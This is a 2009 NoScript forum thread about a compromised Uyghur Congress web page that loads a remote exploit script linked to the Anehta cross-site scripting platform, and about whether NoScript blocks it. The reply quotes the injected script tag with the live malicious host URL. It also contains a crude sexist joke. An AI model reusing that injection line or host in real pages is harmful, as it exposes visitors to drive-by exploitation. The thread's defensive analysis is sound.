anehta from axis - does NoScript protect?

General discussion about the NoScript extension for Firefox
Post Reply
luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

anehta from axis - does NoScript protect?

Post by luntrus » Mon Jul 27, 2009 3:46 pm

Hi forum members,

Look at the following malcode analysis:
exploit
Here are the details I encountered:

1. Virus identified: JS-CVE-2009-1136-A[Expl] (which is an Exploit)
2. Web address: wXw.uyghurcongress.org/En/home.asp
3. Malicious file identified by Avast!: m2m.net84.net/cn/document.js

Mentioned site with this document.js is the malcode residing site:

Code: Select all

[EDITED by me for security reasons and against scanner detection]^^script src="htxtp://m2m.net84.net/cn/document.js"^^/script 

And this is:
Title:
HTTP Error 403 Forbidden
URL: hXtp://m2m.net84.net/cn
Redirects: 301 -> hXtp://m2m.net84.net/cn/
where I find the following:

Code: Select all

 [again EDITED by me]
^a href="anehta-v0.6.0fixed/" anehta-v0.6.0fixed/^/a></li

And this is at the crux of the malcode, because Description (packet storm's):
Anehta is a PHP/Javascript based platform to make cross site scripting and other web attacks easier.
Author: axis
Homepage: hXtp://code.google.com/p/anehta/
File Size: 5596731
Last Modified: Nov 25 17:46:32 2008
MD5 Checksum: 5316c6cb785caef595c58e80a97f4ce8
More info on this new XSS platform: http://archives.neohapsis.com/archives/ ... /0565.html
other redirect is to:
302 -> hXtp://error.000webhost.com/forbidden.html

Is NoScript protecting us against anehta driven exploits?

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Iron/3.0.189.0 Safari/531.0

User avatar
therube
Ambassador
Posts: 7570
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: anehta from axis - does NoScript protect?

Post by therube » Tue Jul 28, 2009 12:39 am

First, when you visit uyghurcongress (presumably) JavaScript is not allowed, so the exploit is thwarted right there.

Code: Select all

<script src="http://m2m.net84.net/cn/document.js"></script>


Second, even if you do Allow JavaScript on uyghurcongress, the exploit is still hosted on a foreign domain, so again the exploit is thwarted.

Third, the exploit page itself doesn't seem to be returning anything at the moment.
(I wonder if it might only do something if you're visiting from a .cn domain?)

Code: Select all

Secur1ty just lik3 a grl. B0th of th3m h4ve s0me h0les. Y0u alw4ys try to f1nd the h0le, but n0t 3very tim3 y0u c4n 3xpl0it it!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.1pre) Gecko/20090717 SeaMonkey/2.0b1

Post Reply